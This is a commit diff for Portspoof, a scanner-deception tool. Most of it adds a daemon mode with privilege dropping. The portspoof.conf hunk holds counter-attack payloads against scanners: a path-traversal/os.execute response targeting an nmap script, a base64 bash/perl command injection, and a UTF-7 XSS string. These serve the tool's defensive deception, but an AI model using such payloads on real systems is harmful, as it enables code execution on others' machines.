ready for release

2024-06-28 09:41:36 +00:00 · 2013-07-22 14:36:59 +02:00 · 2013-07-22 14:36:59 +02:00 · 9765f738db
commit 9765f738db
parent 1791fe4e2b
9 changed files with 146 additions and 11 deletions
--- a/src/Configuration.cpp
+++ b/src/Configuration.cpp
@ -43,6 +43,9 @@ Configuration::Configuration()
 	signaturefile = std::string(SIGNATURE_FILE);
 	logfile = std::string(LOG_FILE);
 	bind_ip=std::string();
+	username=std::string(DAEMON_USER);
+	group=std::string(DAEMON_USER);
+
 	port=DEFAULT_PORT;	
 	opts=0;
 	nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);	
@ -63,6 +66,7 @@ void  Configuration::usage(void)
 	"Portspoof - service signature emulator / exploitation framework.\n\n"
 	  "-i			  ip : Bind to a particular  IP address\n"
 	  "-p			  port : Bind to a particular PORT number\n"
+	  "-D			  run as daemon process\n"
 	  "-s			  file_path : Portspoof service signature regex. file\n"
 	  "-c			  file_path : Portspoof configuration file\n"
 	  "-l			  file_path : Log port scanning alerts to a file\n"
@ -84,7 +88,7 @@ bool Configuration::processArgs(int argc, char** argv)
 	int	ch;
 	extern char *__progname;
 	
-	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
+	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123D")) != -1) {
 		switch (ch) {
 		case 'i':
 			this->bind_ip = std::string(optarg);
@ -112,6 +116,9 @@ bool Configuration::processArgs(int argc, char** argv)
 		this->opts[OPT_SYSLOG_DIS]=1;
 			fprintf(stdout,"-> Syslog logging disabled.\n");
 			break;
+		case 'D':
+		this->opts[OPT_RUN_AS_D]=1;
+			break;
 		case 'l':
 		this->opts[OPT_LOG_FILE]=1;
 			this->logfile  = std::string(optarg);
@ -214,10 +221,31 @@ unsigned short int Configuration::getPort()

 int Configuration::getThreadNr()
 {
-
 	return this->thread_number;
 }

+
+int Configuration::getUserid()
+{
+        struct passwd *pwd = getpwnam(this->username.c_str()); 
+        if(pwd) return pwd->pw_uid;
+        
+        return -1;
+}
+
+
+int Configuration::getGroupid()
+{
+        struct group *grp = getgrnam(this->group.c_str()); 
+        if(grp) return grp->gr_gid;
+
+        return -1;
+
+}
+
+
+
+
 std::vector<char> Configuration::mapPort2Signature(unsigned short port)
 {	
 	
--- a/src/Configuration.h
+++ b/src/Configuration.h
@ -44,6 +44,10 @@
 #define LOG_FILE "portspoof.log"
 #define CONF_FILE "portspoof.conf"
 #define SIGNATURE_FILE "portspoof_signatures"
+
+#define DAEMON_USER "daemon"
+#define DAEMON_GROUP "daemon"
+
 #define OPT_FUZZ_WORDLIST 1
 #define OPT_IP 2
 #define OPT_PORT 3
@ -56,14 +60,14 @@
 #define OPT_FUZZ_INTERNAL 10
 #define OPT_NOT_NMAP_SCANNER 11
 #define OPT_FUZZ_RANDOM 12
+#define OPT_RUN_AS_D 13
+

 #define MAX_PORTS 65535

-
 #include <string>
 #include <stdio.h>
 #include <ctype.h>
-#include <pcap.h>
 #include <map>
 #include <vector>
 #include <sstream>
@ -72,6 +76,11 @@
 #include <iostream>
 #include <ctime> 
 #include <bitset>
+#include <sys/types.h>
+#include <stdio.h>
+#include <pwd.h> 
+#include <grp.h>
+#include <unistd.h>


 #include "Utils.h"
@ -98,6 +107,9 @@ class Configuration {
 		std::string signaturefile;
 		std::string logfile;
 		std::string bind_ip;
+		std::string username;
+		std::string group;
+
 		unsigned short int port;
 		int thread_number;
 		bool fuzzing_mode;
@ -127,7 +139,8 @@ class Configuration {
 		bool getConfigValue(int value);
 		unsigned short int getPort();
 		int getThreadNr();
-			
+		int getGroupid();
+		int getUserid();
 };


--- a/src/Fuzzer.h
+++ b/src/Fuzzer.h
@ -42,7 +42,6 @@
 #include <string>
 #include <stdio.h>
 #include <ctype.h>
-#include <pcap.h>
 #include <map>
 #include <vector>
 #include <sstream>
--- a/src/Server.cpp
+++ b/src/Server.cpp
@ -174,3 +174,87 @@ int Server::choose_thread()
 	
 	return min;
 }
+
+
+
+void Server::daemonize()
+{
+
+	const string &dir = "/";
+    const std::string &stdinfile = "/dev/null";
+    const std::string &stdoutfile = "/dev/null";
+    const std::string &stderrfile = "/dev/null";
+
+
+  umask(0);
+/* 
+  rlimit rl;
+  if (getrlimit(RLIMIT_NOFILE, &rl) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  }
+ 
+
+ 
+*/
+  
+  pid_t pid;
+  if ((pid = fork()) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  } else if (pid != 0) { //parent
+    exit(0);
+  }
+
+  setsid();
+ 
+  if (!dir.empty() && chdir(dir.c_str()) < 0) 
+  {
+    throw std::runtime_error(strerror(errno));
+  }
+ 
+
+   if (setgid(this->configuration->getGroupid()) != 0)
+   {
+ 	fprintf(stdout,"setgid: Unable to drop group privileges: %s", strerror(errno));
+	fflush(stdout);
+	exit(-1);
+   }
+   
+
+   if (setuid(this->configuration->getUserid()) != 0)
+   	{
+ 	fprintf(stdout,"setuid: Unable to drop user privileges: %s", strerror(errno));
+	fflush(stdout);
+	exit(-1);
+   }
+
+
+/*
+  if (rl.rlim_max == RLIM_INFINITY) 
+  {
+    rl.rlim_max = 1024;
+  }
+ 
+  for (unsigned int i = 0; i < rl.rlim_max; i++) 
+  {
+    close(i);
+  }
+ 
+ */
+
+  int fd0 = open(stdinfile.c_str(), O_RDONLY);
+  int fd1 = open(stdoutfile.c_str(),
+      O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
+  int fd2 = open(stderrfile.c_str(),
+      O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
+ 
+ /*
+  if (fd0 != STDIN_FILENO || fd1 != STDOUT_FILENO || fd2 != STDERR_FILENO) 
+  {
+    throw runtime_error("new standard file descriptors were not opened as expected");
+  }
+  */
+
+
+}
--- a/src/Server.h
+++ b/src/Server.h
@ -42,6 +42,12 @@
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <sys/ioctl.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <pwd.h>
+#include <unistd.h>
+#include <stdexcept>
+#include <sys/resource.h>

 #include <time.h> 
 #include "Threads.h" 
@ -66,6 +72,7 @@ class Server{
 		Server(Configuration* configuration);
 		int choose_thread();
 		bool run();
+		void daemonize();
 };

 #endif
--- a/src/portspoof.cpp
+++ b/src/portspoof.cpp
@ -55,6 +55,10 @@ int main(int argc, char **argv)
 		exit(1);
 		
 	server = new Server(configuration);
+
+	if(configuration->getConfigValue(OPT_RUN_AS_D))
+		server->daemonize();
+
 	server->run();

 	return 0;
--- a/src/revregex.cpp
+++ b/src/revregex.cpp
@ -33,6 +33,7 @@
 *   forward this exception.
 */

+// TODO: TO BE ENTIRELY REWRITTEN!

 #include "revregex.h"

--- a/system_files/init.d/portspoof.sh
+++ b/system_files/init.d/portspoof.sh
@ -1,13 +1,12 @@
 #!/bin/sh
-# Starts and stops Portspoof
+# Starts and stops Portspoof daemon
 #

-
 case "$1" in
 start)
 	
             if !  pidof portspoof >/dev/null; then
-                   /usr/local/bin/portspoof -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures 
+                   /usr/local/bin/portspoof -D -c /usr/local/etc/portspoof.conf -s /usr/local/etc/portspoof_signatures 
                   echo "Starting Portspoof..."
             else
                    echo "Portspoof already running.."
--- a/tools/portspoof.conf
+++ b/tools/portspoof.conf
@ -96,10 +96,10 @@
 # NMAP 
 # nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145  -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/'  -d4

-80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
+80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"	

 #OS cmd injection payload for bash: $(cat output) and `cat output` injections
-9090 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV[0];~s/SPACE/\t/ig;eval;$_=$ARGV[1];eval(decode_base64($_));"
+8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"

 #McAffe SuperScan UTF7 XSS payload
 1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"